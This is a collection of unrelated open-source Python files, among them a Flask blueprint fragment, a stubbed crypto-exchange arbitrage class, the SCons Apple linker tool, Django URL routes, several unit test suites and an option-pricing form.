"""
def decorator(f):
self.record(lambda s: s.app.errorhandler(code)(f))
return f
return decorator
def errorhandler(self, code_or_exception):
"""Registers an error handler that becomes active for this blueprint
only. Please be aware that routing does not happen local to a
blueprint so an error handler for 404 usually is not handled by
a blueprint unless it is caused inside a view function. Another
special case is the 500 internal server error which is always looked
up from the application.
Otherwise works as the `Cocopot.errorhandler` decorator
of the `Cocopot` object.
"""
def decorator(f):
self.record(lambda s: s.app._register_error_handler(
self.name, code_or_exception, f))
return f
return decorator
| zeaphoo/cocopot | cocopot/blueprints.py | Python | mit | 6,866 |
# exchange class for FXBTC - I expect that there will be more arb opportunities
# since chinese and US markets are fundamentally mispriced.
# NOTE: all rates and currencies multiplied by 10^8 to avoid floating point!
# this will be a very important consideration
from Exchange import Exchange
from fxbtc import fx
from myutils import get_swapped_order
from order import Order
class FXBTC(Exchange):
def __init__(self, api_key, secret):
# self.api = fx(api_key, secret)
super(FXBTC, self).__init__()
self.name = 'FXBTC'
self.trading_fee = 0.002 # TODO - check this
self.marketids = {}
def get_tradeable_pairs(self):
pass
# tradeable_pairs = []
# self.pairIDs = {} # also initialize pairID reference while we're at it
# trade_pairs = self.api.get_trade_pairs()
# for pair in trade_pairs["trade_pairs"]:
# pairID = str(pair["id"])
# currencies = pair["url_slug"].split("_")
# base = currencies[0].upper()
# alt = currencies[1].upper()
# tradeable_pairs.append((base, alt))
# slug = base + "_" + alt
# self.pairIDs[slug] = pairID
# return tradeable_pairs
def get_depth(self, base, alt):
pass
# """
# coinEx does not support retrieving all depths! GRRRR
# TODO - need to also append orderID!!!
# """
# pair0 = (base, alt)
# pair, swapped = self.get_validated_pair(pair0)
# newbase, newalt = pair
# pairID = self.get_pairID(newbase, newalt)
# orders = self.api.get_orders(pairID)
# book = { "bids" : [], "asks" : [] }
# for data in orders["orders"]:
# if not data["complete"]:
# price = float(data["rate"]*1e-8)
# volume = float(data["amount"]*1e-8)
# order = Order(price, volume, orderID=data['id'], timestamp=data['created_at'])
# if not swapped:
# if data['bid']: # buy order
# book['bids'].append(order)
# else: # sell order
# book['asks'].append(order)
# else: # is swapped
# order = get_swapped_order(order)
# if data['bid']:
# book['asks'].append(order)
# else:
# book['bids'].append(order)
#
# return book
def get_balance(self, currency):
pass
# '''
# warning: dont call this too often.
# use get_all_balances instead
# '''
# balances = self.api.get_balances()
# for c in balances["balances"]:
# if currency == c["currency_name"]:
# return c["amount"] * 1e-8
# return 0.0
def get_all_balances(self):
pass
# data = self.api.get_balances()
# balances = {c["currency_name"] : c["amount"]*1e-8 for c in data['balances']}
# return balances
def submit_order(self, gc, gv, rc, rv):
return NotImplemented
# pair0 = (gc, rc)
# pair, swapped = self.get_validated_pair(pair0)
# newbase, newalt = pair
# pairID = self.get_pairID(newbase, newalt)
# TODO, do maths here
# self.api.submit_order(self, pairID, amount, order_type, rate)
def confirm_order(self, orderID):
pass
#data = self.api.get_order_status(orderID)
# TODO
# borrowed from Cryptsy API
def get_pairID(self, base, alt):
pass
# if (base, alt) in self.tradeable_pairs:
# slug = base + "_" + alt
# return self.pairIDs[slug]
# elif (alt, base) in self.tradeable_pairs:
# slug = alt + "_" + base
# return self.pairIDs[slug]
# else:
# return 'ERROR!'
| ericjang/cryptocurrency_arbitrage | FXBTC.py | Python | gpl-3.0 | 3,903 |
"""SCons.Tool.applelink
Tool-specific initialization for the Apple gnu-like linker.
There normally shouldn't be any need to import this module directly.
It will usually be imported through the generic SCons.Tool.Tool()
selection method.
"""
#
# Copyright (c) 2001 - 2014 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/Tool/applelink.py 2014/07/05 09:42:21 garyo"
import SCons.Util
# Even though the Mac is based on the GNU toolchain, it doesn't understand
# the -rpath option, so we use the "link" tool instead of "gnulink".
import link
def generate(env):
"""Add Builders and construction variables for applelink to an
Environment."""
link.generate(env)
env['FRAMEWORKPATHPREFIX'] = '-F'
env['_FRAMEWORKPATH'] = '${_concat(FRAMEWORKPATHPREFIX, FRAMEWORKPATH, "", __env__)}'
env['_FRAMEWORKS'] = '${_concat("-framework ", FRAMEWORKS, "", __env__)}'
env['LINKCOM'] = env['LINKCOM'] + ' $_FRAMEWORKPATH $_FRAMEWORKS $FRAMEWORKSFLAGS'
env['SHLINKFLAGS'] = SCons.Util.CLVar('$LINKFLAGS -dynamiclib')
env['SHLINKCOM'] = env['SHLINKCOM'] + ' $_FRAMEWORKPATH $_FRAMEWORKS $FRAMEWORKSFLAGS'
# override the default for loadable modules, which are different
# on OS X than dynamic shared libs. echoing what XCode does for
# pre/suffixes:
env['LDMODULEPREFIX'] = ''
env['LDMODULESUFFIX'] = ''
env['LDMODULEFLAGS'] = SCons.Util.CLVar('$LINKFLAGS -bundle')
env['LDMODULECOM'] = '$LDMODULE -o ${TARGET} $LDMODULEFLAGS $SOURCES $_LIBDIRFLAGS $_LIBFLAGS $_FRAMEWORKPATH $_FRAMEWORKS $FRAMEWORKSFLAGS'
def exists(env):
return env['PLATFORM'] == 'darwin'
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
| fluxer/spm | nuitka/nuitka/build/inline_copy/lib/scons-2.3.2/SCons/Tool/applelink.py | Python | gpl-2.0 | 2,796 |
from django.conf.urls import url, include
from django.urls import path
from django.utils.translation import pgettext_lazy
from django.views.generic.base import RedirectView
from ..views import (
delete_draft, claim_draft,
ListRequestView, UserRequestFeedView,
user_calendar
)
from ..filters import FOIREQUEST_FILTERS
STATUS_URLS = [str(x[0]) for x in FOIREQUEST_FILTERS]
urlpatterns = [
# Old feed URL
url(pgettext_lazy('url part', r'^latest/feed/$'),
RedirectView.as_view(pattern_name='foirequest-list_feed_atom', permanent=True),
name='foirequest-feed_latest_atom'),
url(pgettext_lazy('url part', r'^latest/rss/$'),
RedirectView.as_view(pattern_name='foirequest-list_feed', permanent=True),
name='foirequest-feed_latest'),
url(r'^delete-draft$', delete_draft, name='foirequest-delete_draft'),
path('claim/<uuid:token>/', claim_draft, name='foirequest-claim_draft'),
]
foirequest_urls = [
url(r'^$', ListRequestView.as_view(), name='foirequest-list'),
url(r'^feed/$', ListRequestView.as_view(feed='atom'), name='foirequest-list_feed_atom'),
url(r'^rss/$', ListRequestView.as_view(feed='rss'), name='foirequest-list_feed'),
# Translators: part in request filter URL
url(pgettext_lazy('url part', r'^topic/(?P<category>[-\w]+)/$'),
ListRequestView.as_view(), name='foirequest-list'),
url(pgettext_lazy('url part', r'^topic/(?P<category>[-\w]+)/feed/$'),
ListRequestView.as_view(feed='atom'), name='foirequest-list_feed_atom'),
url(pgettext_lazy('url part', r'^topic/(?P<category>[-\w]+)/rss/$'),
ListRequestView.as_view(feed='rss'), name='foirequest-list_feed'),
# # Translators: part in request filter URL
url(pgettext_lazy('url part', r'^tag/(?P<tag>[-\w]+)/$'),
ListRequestView.as_view(), name='foirequest-list'),
url(pgettext_lazy('url part', r'^tag/(?P<tag>[-\w]+)/feed/$'),
ListRequestView.as_view(feed='atom'), name='foirequest-list_feed_atom'),
url(pgettext_lazy('url part', r'^tag/(?P<tag>[-\w]+)/rss/$'),
ListRequestView.as_view(feed='rss'), name='foirequest-list_feed'),
# # Translators: part in request filter URL
url(pgettext_lazy('url part', r'^to/(?P<publicbody>[-\w]+)/$'),
ListRequestView.as_view(), name='foirequest-list'),
url(pgettext_lazy('url part', r'^to/(?P<publicbody>[-\w]+)/feed/$'),
ListRequestView.as_view(feed='atom'), name='foirequest-list_feed_atom'),
url(pgettext_lazy('url part', r'^to/(?P<publicbody>[-\w]+)/rss/$'),
ListRequestView.as_view(feed='rss'), name='foirequest-list_feed'),
url(pgettext_lazy('url part', r'^token/(?P<token>[-\w]+)/feed/$'),
UserRequestFeedView.as_view(feed='atom'), name='foirequest-user_list_feed_atom'),
url(pgettext_lazy('url part', r'^token/(?P<token>[-\w]+)/rss/$'),
UserRequestFeedView.as_view(feed='rss'), name='foirequest-user_list_feed'),
url(pgettext_lazy('url part', r'^token/(?P<token>[-\w]+)/calendar/$'),
user_calendar, name='foirequest-user_ical_calendar'),
] + [url(r'^(?P<status>%s)/$' % status, ListRequestView.as_view(),
name='foirequest-list')
for status in STATUS_URLS
] + [url(r'^(?P<status>%s)/feed/$' % status,
ListRequestView.as_view(feed='atom'), name='foirequest-list_feed_atom')
for status in STATUS_URLS
] + [url(r'^(?P<status>%s)/rss/$' % status,
ListRequestView.as_view(feed='rss'), name='foirequest-list_feed')
for status in STATUS_URLS
]
urlpatterns += foirequest_urls
urlpatterns += [
url(r'^(?P<jurisdiction>[-\w]+)/', include(foirequest_urls))
]
| stefanw/froide | froide/foirequest/urls/list_requests_urls.py | Python | mit | 3,643 |
#!/usr/bin/env python
# ----------------------------------------------------------------------------
# Copyright (c) 2014--, tax-credit development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
# ----------------------------------------------------------------------------
from unittest import TestCase, main
from shutil import rmtree
from os import makedirs
from tempfile import mkdtemp
from os.path import join, exists
from tax_credit.simulated_communities import (generate_simulated_communities)
class EvalFrameworkTests(TestCase):
@classmethod
def setUpClass(cls):
_table1 = '\n'.join([
'#SampleID\tk__Bacteria; p__Proteobacteria; c__Gammaproteobacteria'
'; o__Legionellales; f__Legionellaceae; g__Legionella; s__\t'
'k__Bacteria; p__Bacteroidetes; c__Flavobacteriia; o__Flavobacter'
'iales; f__Flavobacteriaceae; g__Flavobacterium; s__',
's1\t0.5\t0.5',
's2\t0.1\t0.9'])
cls.table2 = '\n'.join(['#SampleID\t0001\t0003',
's1\t0.5\t0.5',
's2\t0.1\t0.9\n'])
_ref1 = '\n'.join([
'0001\tk__Bacteria; p__Proteobacteria; c__Gammaproteobacteria; '
'o__Legionellales; f__Legionellaceae; g__Legionella; s__',
'0003\tk__Bacteria; p__Bacteroidetes; c__Flavobacteriia; o__Flavo'
'bacteriales; f__Flavobacteriaceae; g__Flavobacterium; s__'])
cls.seqs1 = '\n'.join(['>0001',
'ACTAGTAGTTGAC',
'>0003',
'ATCGATGCATGCA\n'])
cls.tmpdir = mkdtemp()
testdir = join(cls.tmpdir, 'sim_test')
comm_dir = 'blob'
cls.testpath = join(testdir, comm_dir)
if not exists(cls.testpath):
makedirs(cls.testpath)
tab_fp = join(cls.testpath, 'expected-composition.txt')
with open(tab_fp, 'w') as out:
out.write(_table1)
ref_fp = join(cls.testpath, 'ref1.tmp')
with open(ref_fp, 'w') as out:
out.write(_ref1)
seqs_fp = join(cls.testpath, 'seqs1.tmp')
with open(seqs_fp, 'w') as out:
out.write(cls.seqs1)
refs = {'ref1': (seqs_fp, ref_fp)}
generate_simulated_communities(testdir, [(comm_dir, 'ref1')], refs, 1)
def test_generate_simulated_communities(self):
with open(join(self.testpath, 'simulated-composition.txt'), 'r') as sc:
self.assertEqual(sc.read(), self.table2)
with open(join(self.testpath, 'simulated-seqs.fna'), 'r') as sq:
self.assertEqual(sq.read(), self.seqs1)
@classmethod
def tearDownClass(cls):
rmtree(cls.tmpdir)
if __name__ == "__main__":
main()
| caporaso-lab/short-read-tax-assignment | tax_credit/tests/test_simulated_communities.py | Python | bsd-3-clause | 2,885 |
# coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests model architecture functions."""
import tensorflow as tf
from poem.cv_mim import models
class ModelsTest(tf.test.TestCase):
def test_simple_point_embedder_shapes(self):
input_features = tf.zeros([4, 6], tf.float32)
model = models.SimpleModel(
output_shape=(4, 3),
embedder=models.TYPE_EMBEDDER_POINT,
hidden_dim=1024,
num_residual_linear_blocks=2,
num_layers_per_block=2)
outputs = model(input_features)
self.assertAllEqual(outputs[0].shape, [4, 4, 3])
self.assertAllEqual(outputs[1]['flatten'].shape, [4, 6])
self.assertAllEqual(outputs[1]['fc0'].shape, [4, 1024])
self.assertAllEqual(outputs[1]['res_fcs1'].shape, [4, 1024])
self.assertAllEqual(outputs[1]['res_fcs2'].shape, [4, 1024])
self.assertAllEqual(outputs[1]['embedder'].shape, [4, 4, 3])
def test_simple_point_embedder_forward_pass(self):
input_features = tf.constant([[1.0, 2.0, 3.0]])
model = models.SimpleModel(
output_shape=(4,),
embedder=models.TYPE_EMBEDDER_GAUSSIAN,
hidden_dim=2,
num_residual_linear_blocks=3,
num_layers_per_block=2,
use_batch_norm=False,
weight_initializer='ones')
outputs = model(input_features)
self.assertAllClose(outputs[0], [[1937.0, 1937.0, 1937.0, 1937.0]])
def test_simple_gaussian_embedder_shapes(self):
input_features = tf.zeros([4, 6], tf.float32)
model = models.SimpleModel(
output_shape=(4,),
embedder=models.TYPE_EMBEDDER_GAUSSIAN,
hidden_dim=1024,
num_residual_linear_blocks=2,
num_layers_per_block=2)
outputs = model(input_features)
self.assertAllEqual(outputs[0].shape, [4, 4])
self.assertAllEqual(outputs[1]['flatten'].shape, [4, 6])
self.assertAllEqual(outputs[1]['fc0'].shape, [4, 1024])
self.assertAllEqual(outputs[1]['res_fcs1'].shape, [4, 1024])
self.assertAllEqual(outputs[1]['res_fcs2'].shape, [4, 1024])
self.assertAllEqual(outputs[1]['embedder'].shape, [4, 4])
def test_simple_gaussian_embedder(self):
input_features = tf.ones([1, 6], tf.float32)
model = models.SimpleModel(
output_shape=(1,),
embedder=models.TYPE_EMBEDDER_GAUSSIAN,
hidden_dim=1024,
num_residual_linear_blocks=2,
num_layers_per_block=2,
weight_initializer='ones')
tf.random.set_seed(0)
outputs_x = model(input_features, training=True)
outputs_y = model(input_features, training=True)
self.assertNotAllEqual(outputs_x[0], outputs_y[0])
outputs_x = model(input_features, training=False)
outputs_y = model(input_features, training=False)
self.assertAllEqual(outputs_x[0], outputs_y[0])
def test_semgcn_shapes(self):
input_features = tf.zeros([4, 8, 2], tf.float32)
model = models.GCN(
output_dim=3,
affinity_matrix=tf.ones(shape=(8, 8)),
gconv_class=models.SemGraphConv,
hidden_dim=128,
num_residual_gconv_blocks=2,
num_layers_per_block=2)
outputs = model(input_features)
self.assertAllEqual(outputs[0].shape, [4, 8, 3])
self.assertAllEqual(outputs[1]['gconv0'].shape, [4, 8, 128])
self.assertAllEqual(outputs[1]['res_gconvs1'].shape, [4, 8, 128])
self.assertAllEqual(outputs[1]['res_gconvs2'].shape, [4, 8, 128])
self.assertAllEqual(outputs[1]['gconv3'].shape, [4, 8, 3])
def test_semgcn_forward_pass(self):
input_features = tf.constant([1.0, 2.0, 3.0], dtype=tf.float32)
input_features = tf.reshape(input_features, [1, 3, 1])
model = models.GCN(
output_dim=1,
affinity_matrix=tf.ones(shape=(3, 3)),
gconv_class=models.SemGraphConv,
hidden_dim=2,
num_residual_gconv_blocks=2,
num_layers_per_block=2,
use_batch_norm=False,
dropout_rate=0.0,
kernel_initializer='ones',
bias_initializer='zeros')
outputs, _ = model(input_features)
self.assertAllEqual(outputs.shape, [1, 3, 1])
self.assertAllClose(outputs, tf.reshape([100.0, 100.0, 100.0], [1, 3, 1]))
def test_likelihood_estimator_shapes(self):
input_features = tf.zeros([4, 6], tf.float32)
model = models.LikelihoodEstimator(output_dim=2)
outputs = model(input_features)
self.assertAllEqual(outputs[0].shape, [4, 2])
self.assertAllEqual(outputs[1].shape, [4, 2])
if __name__ == '__main__':
tf.test.main()
| google-research/google-research | poem/cv_mim/models_test.py | Python | apache-2.0 | 5,000 |
from django.contrib.auth.models import User
from django.contrib.sessions.backends.base import SessionBase
from django.test import TestCase
from django.test.client import RequestFactory
from uwsgi_it_api.views import *
from uwsgi_it_api.views_metrics import *
from uwsgi_it_api.views_private import *
import base64
import datetime
import json
class FakeSession(SessionBase):
def create(self):
return
def delete(self, key=None):
return
class ViewsTest(TestCase):
def setUp(self):
self.user = User.objects.create_user(
username='test', email='test@uwsgi.it', password='top_secret')
self.basic_auth = 'basic %s' % (base64.b64encode('test:top_secret'))
self.server_address = "10.0.0.1"
# customer api
self.server, _ = Server.objects.get_or_create(
name="server",
address=self.server_address,
hd="hd",
memory=100,
storage=100
)
self.customer, _ = Customer.objects.get_or_create(user=self.user)
self.container, _ = Container.objects.get_or_create(
customer=self.customer,
server=self.server,
memory=10,
storage=10,
name="container"
)
self.container2, _ = Container.objects.get_or_create(
customer=self.customer,
server=self.server,
memory=10,
storage=10,
name="container2"
)
self.c_uid = self.container.uid
self.domain, _ = Domain.objects.get_or_create(customer=self.customer, name="domain")
self.d_uuid = self.domain.uuid
self.tag, _ = Tag.objects.get_or_create(customer=self.customer, name="tag")
self.loopbox, _ = Loopbox.objects.get_or_create(container=self.container, filename='filename', mountpoint='mountpoint')
self.loopbox2, _ = Loopbox.objects.get_or_create(container=self.container2, filename='filename2', mountpoint='mountpoint2')
self.loopbox3, _ = Loopbox.objects.get_or_create(container=self.container, filename='filename3', mountpoint='mountpoint3')
self.l_id = self.loopbox.id
self.l2_id = self.loopbox2.id
self.l3_id = self.loopbox3.id
self.container.tags.add(self.tag)
self.domain.tags.add(self.tag)
self.loopbox.tags.add(self.tag)
self.loopbox2.tags.add(self.tag)
self.alarms = []
for i in range(0, 10):
a = Alarm(container=self.container, msg='test', level=1, unix=datetime.datetime.now())
a.save()
self.alarms.append(a)
# metrics
today = datetime.datetime.today()
NetworkRXContainerMetric.objects.create(
container=self.container,
year=today.year,
month=today.month,
day=today.day,
)
NetworkTXContainerMetric.objects.create(
container=self.container,
year=today.year,
month=today.month,
day=today.day,
)
CPUContainerMetric.objects.create(
container=self.container,
year=today.year,
month=today.month,
day=today.day,
)
MemoryContainerMetric.objects.create(
container=self.container,
year=today.year,
month=today.month,
day=today.day,
)
IOReadContainerMetric.objects.create(
container=self.container,
year=today.year,
month=today.month,
day=today.day,
)
IOWriteContainerMetric.objects.create(
container=self.container,
year=today.year,
month=today.month,
day=today.day,
)
QuotaContainerMetric.objects.create(
container=self.container,
year=today.year,
month=today.month,
day=today.day,
)
HitsDomainMetric.objects.create(
domain=self.domain,
container=self.container,
year=today.year,
month=today.month,
day=today.day,
)
NetworkRXDomainMetric.objects.create(
domain=self.domain,
container=self.container,
year=today.year,
month=today.month,
day=today.day,
)
NetworkTXDomainMetric.objects.create(
domain=self.domain,
container=self.container,
year=today.year,
month=today.month,
day=today.day,
)
self.factory = RequestFactory()
def logged_get_response_for_view(self, path, view, kwargs=None, params={}):
headers = {
'HTTP_AUTHORIZATION': self.basic_auth,
'HTTPS_DN': 'hithere',
'REMOTE_ADDR': self.server_address,
}
request = self.factory.get(path, params, **headers)
request.user = self.user
request.session = FakeSession()
if kwargs is None:
kwargs = {}
return view(request, **kwargs)
class ApiTest(ViewsTest):
def test_me(self):
response = self.logged_get_response_for_view('/me', me)
self.assertEqual(response.status_code, 200)
def test_me_containers(self):
response = self.logged_get_response_for_view('/me/containers', containers)
self.assertEqual(response.status_code, 200)
def test_containers(self):
response = self.logged_get_response_for_view('/containers', containers)
self.assertEqual(response.status_code, 200)
def test_containers_filters_tags(self):
response = self.logged_get_response_for_view('/containers', containers, params={'tags': 'tag'})
self.assertEqual(response.status_code, 200)
self.assertContains(response, '"uid": {}'.format(self.c_uid))
response = self.logged_get_response_for_view('/containers', containers, params={'tags': 'fail'})
self.assertEqual(response.status_code, 200)
self.assertNotContains(response, '"uid": {}'.format(self.c_uid))
def test_container(self):
response = self.logged_get_response_for_view('/containers/1', container, {'id': self.c_uid})
self.assertEqual(response.status_code, 200)
self.assertContains(response, 'alarm_freq')
def test_distros(self):
response = self.logged_get_response_for_view('/distros', distros)
self.assertEqual(response.status_code, 200)
def test_domains(self):
response = self.logged_get_response_for_view('/domains', domains)
self.assertEqual(response.status_code, 200)
def test_domains_filters_tags(self):
response = self.logged_get_response_for_view('/domains', domains, params={'tags': 'tag'})
self.assertEqual(response.status_code, 200)
self.assertContains(response, '"uuid": "{}"'.format(self.d_uuid))
response = self.logged_get_response_for_view('/domains', domains, params={'tags': 'fail'})
self.assertEqual(response.status_code, 200)
self.assertNotContains(response, 'uuid: "{}"'.format(self.d_uuid))
def test_domain(self):
response = self.logged_get_response_for_view('/domains/1', domain, {'id': self.domain.pk})
self.assertEqual(response.status_code, 200)
def test_loopboxes(self):
response = self.logged_get_response_for_view('/loopboxes', loopboxes)
self.assertEqual(response.status_code, 200)
self.assertContains(response, '"id": {}'.format(self.l_id))
self.assertContains(response, '"id": {}'.format(self.l2_id))
self.assertContains(response, '"id": {}'.format(self.l3_id))
def test_loopboxes_filters_per_container(self):
response = self.logged_get_response_for_view('/loopboxes', loopboxes, params={'container': self.c_uid})
self.assertEqual(response.status_code, 200)
self.assertContains(response, '"id": {}'.format(self.l_id))
self.assertContains(response, '"id": {}'.format(self.l3_id))
self.assertNotContains(response, '"id": {}'.format(self.l2_id))
def test_loopboxes_filters_per_tag(self):
response = self.logged_get_response_for_view('/loopboxes', loopboxes, params={'tags': 'tag'})
self.assertEqual(response.status_code, 200)
self.assertContains(response, '"id": {}'.format(self.l_id))
self.assertContains(response, '"id": {}'.format(self.l2_id))
self.assertNotContains(response, '"id": {}'.format(self.l3_id))
def test_loopboxes_filters_per_tag_and_container(self):
response = self.logged_get_response_for_view('/loopboxes', loopboxes, params={'tags': 'tag', 'container': self.c_uid})
self.assertEqual(response.status_code, 200)
self.assertContains(response, '"id": {}'.format(self.l_id))
self.assertNotContains(response, '"id": {}'.format(self.l2_id))
self.assertNotContains(response, '"id": {}'.format(self.l3_id))
def test_loopbox(self):
response = self.logged_get_response_for_view('/loopboxes/{}'.format(self.l_id), loopbox, {'id': self.l_id})
self.assertEqual(response.status_code, 200)
self.assertContains(response, '"id": {}'.format(self.l_id))
def test_alarms_range(self):
response = self.logged_get_response_for_view('/alarms/', alarms, params={'range': '6'})
self.assertEqual(response.status_code, 200)
a = json.loads(response.content)
self.assertEqual(len(a), 6)
for i in range(0, 6):
self.assertEqual(a[i]['id'], self.alarms[9-i].id)
def test_alarms_range_throws_416(self):
response = self.logged_get_response_for_view('/alarms/', alarms, params={'range': '6-a'})
self.assertEqual(response.status_code, 416)
response = self.logged_get_response_for_view('/alarms/', alarms, params={'range': '6-'})
self.assertEqual(response.status_code, 416)
response = self.logged_get_response_for_view('/alarms/', alarms, params={'range': '-a'})
self.assertEqual(response.status_code, 416)
response = self.logged_get_response_for_view('/alarms/', alarms, params={'range': 'a'})
self.assertEqual(response.status_code, 416)
response = self.logged_get_response_for_view('/alarms/', alarms, params={'range': ''})
self.assertEqual(response.status_code, 416)
def test_alarms_range_between_two_values(self):
response = self.logged_get_response_for_view('/alarms/', alarms, params={'range': '3-6'})
self.assertEqual(response.status_code, 200)
a = json.loads(response.content)
self.assertEqual(len(a), 3)
for i in range(0, 3):
self.assertEqual(a[i]['id'], self.alarms[6-i].id)
def test_alarms_range_between_two_value_reversed(self):
response = self.logged_get_response_for_view('/alarms/', alarms, params={'range': '6-3'})
self.assertEqual(response.status_code, 200)
a = json.loads(response.content)
self.assertEqual(len(a), 3)
for i in range(0, 3):
self.assertEqual(a[i]['id'], self.alarms[3+i].id)
def test_tags(self):
response = self.logged_get_response_for_view('/tags', tags)
self.assertEqual(response.status_code, 200)
def test_tag(self):
response = self.logged_get_response_for_view('/tags/1', tag, {'id': self.tag.pk})
self.assertEqual(response.status_code, 200)
response = self.logged_get_response_for_view('/metrics/container.io.read/1', metrics_container_io_read, {'id': self.c_uid})
self.assertEqual(response.status_code, 200)
def test_io_write(self):
response = self.logged_get_response_for_view('/metrics/container.io.write/1', metrics_container_io_write, {'id': self.c_uid})
self.assertEqual(response.status_code, 200)
def test_net_rx(self):
response = self.logged_get_response_for_view('/metrics/container.net.rx/1', metrics_container_net_rx, {'id': self.c_uid})
self.assertEqual(response.status_code, 200)
def test_net_tx(self):
response = self.logged_get_response_for_view('/metrics/container.net.tx/1', metrics_container_net_tx, {'id': self.c_uid})
self.assertEqual(response.status_code, 200)
def test_cpu(self):
response = self.logged_get_response_for_view('/metrics/container.cpu/1', metrics_container_cpu, {'id': self.c_uid})
self.assertEqual(response.status_code, 200)
def test_mem(self):
response = self.logged_get_response_for_view('/metrics/container.mem/1', metrics_container_mem, {'id': self.c_uid})
self.assertEqual(response.status_code, 200)
def test_quota(self):
response = self.logged_get_response_for_view('/metrics/container.quota/1', metrics_container_quota, {'id': self.c_uid})
self.assertEqual(response.status_code, 200)
def test_domain_net_rx(self):
response = self.logged_get_response_for_view('/metrics/domain.net.txt/1', metrics_domain_net_rx, {'id': self.domain.pk})
self.assertEqual(response.status_code, 200)
def test_domain_net_tx(self):
response = self.logged_get_response_for_view('/metrics/domain.net.rx/1', metrics_domain_net_tx, {'id': self.domain.pk})
self.assertEqual(response.status_code, 200)
def test_domain_hits(self):
response = self.logged_get_response_for_view('/metrics/domain.hits/1', metrics_domain_hits, {'id': self.domain.pk})
self.assertEqual(response.status_code, 200)
class PrivateViewsTest(ViewsTest):
def test_containers(self):
response = self.logged_get_response_for_view('/private/containers/', private_containers)
self.assertEqual(response.status_code, 200)
def test_container(self):
response = self.logged_get_response_for_view('/private/containers/1.ini', private_container_ini, {'id': 1})
self.assertEqual(response.status_code, 403)
def test_legion_nodes(self):
response = self.logged_get_response_for_view('/private/legion/nodes/', private_legion_nodes)
self.assertEqual(response.status_code, 403)
def test_nodes(self):
response = self.logged_get_response_for_view('/private/nodes', private_nodes)
self.assertEqual(response.status_code, 200)
def test_domains_rsa(self):
response = self.logged_get_response_for_view('/private/domains/rsa/', private_domains_rsa)
self.assertEqual(response.status_code, 200)
def custom_services(self):
response = self.logged_get_response_for_view('/private/custom_services/', private_custom_services)
self.assertEqual(response.status_code, 200)
def test_io_read(self):
response = self.logged_get_response_for_view('/private/metrics/container.io.read/1', private_metrics_container_io_read, {'id': self.c_uid})
self.assertEqual(response.status_code, 405)
def test_io_write(self):
response = self.logged_get_response_for_view('/private/metrics/container.io.write/1', private_metrics_container_io_write, {'id': self.c_uid})
self.assertEqual(response.status_code, 405)
def test_net_rx(self):
response = self.logged_get_response_for_view('/private/metrics/container.net.rx/1', private_metrics_container_net_rx, {'id': self.c_uid})
self.assertEqual(response.status_code, 405)
def test_net_tx(self):
response = self.logged_get_response_for_view('/private/metrics/container.net.tx/1', private_metrics_container_net_tx, {'id': self.c_uid})
self.assertEqual(response.status_code, 405)
def test_cpu(self):
response = self.logged_get_response_for_view('/private/metrics/container.cpu/1', private_metrics_container_cpu, {'id': self.c_uid})
self.assertEqual(response.status_code, 405)
def test_mem(self):
response = self.logged_get_response_for_view('/private/metrics/container.mem/1', private_metrics_container_mem, {'id': self.c_uid})
self.assertEqual(response.status_code, 405)
def test_quota(self):
response = self.logged_get_response_for_view('/private/metrics/container.quota/1', private_metrics_container_quota, {'id': self.c_uid})
self.assertEqual(response.status_code, 405)
def test_domain_net_rx(self):
response = self.logged_get_response_for_view('/private/metrics/domain.net.txt/1', private_metrics_domain_net_rx, {'id': self.c_uid})
self.assertEqual(response.status_code, 405)
def test_domain_net_tx(self):
response = self.logged_get_response_for_view('/private/metrics/domain.net.rx/1', private_metrics_domain_net_tx, {'id': self.c_uid})
self.assertEqual(response.status_code, 405)
def test_domain_hits(self):
response = self.logged_get_response_for_view('/private/metrics/domain.hits/1', private_metrics_domain_hits, {'id': self.c_uid})
self.assertEqual(response.status_code, 405)
| Mikrobit/uwsgi.it | uwsgi_it_api/uwsgi_it_api/tests.py | Python | mit | 16,887 |
from flask_wtf import FlaskForm
from wtforms import StringField, PasswordField, BooleanField, SubmitField, \
FloatField, RadioField, SelectField, IntegerField
from wtforms.validators import InputRequired, Required, Length, Email, Regexp, EqualTo, DataRequired
from wtforms import ValidationError
from ..models import User
from flask_table import Table, Col
class pyOptionHomeForm(FlaskForm):
optionStyle = SelectField('style',
choices=[('European','European'),
('BullSpread','BullSpread'),
('BullSpreadPathN','BullSpreadPathN'),
('DoubleNoTouch','DoubleNoTouch'),
('OutOfRangeRate','OutOfRangeRate'),
('DownAndOutAlternative','DownAndOutAlternative'),
('ModerateOption','ModerateOption')], validators=[DataRequired()])
optionType = SelectField('type',
choices=[('call','call'), ('put', 'put')], validators=[DataRequired()])
S0 = FloatField('S0', validators=[InputRequired()])
K = FloatField('K', validators=[InputRequired()])
K1 = FloatField('K1', validators=[InputRequired()])
K2 = FloatField('K2', validators=[InputRequired()])
T = FloatField('T', validators=[InputRequired()])
r = FloatField('r', validators=[InputRequired()])
q = FloatField('q', validators=[InputRequired()])
sigma = FloatField('sigma', validators=[InputRequired()])
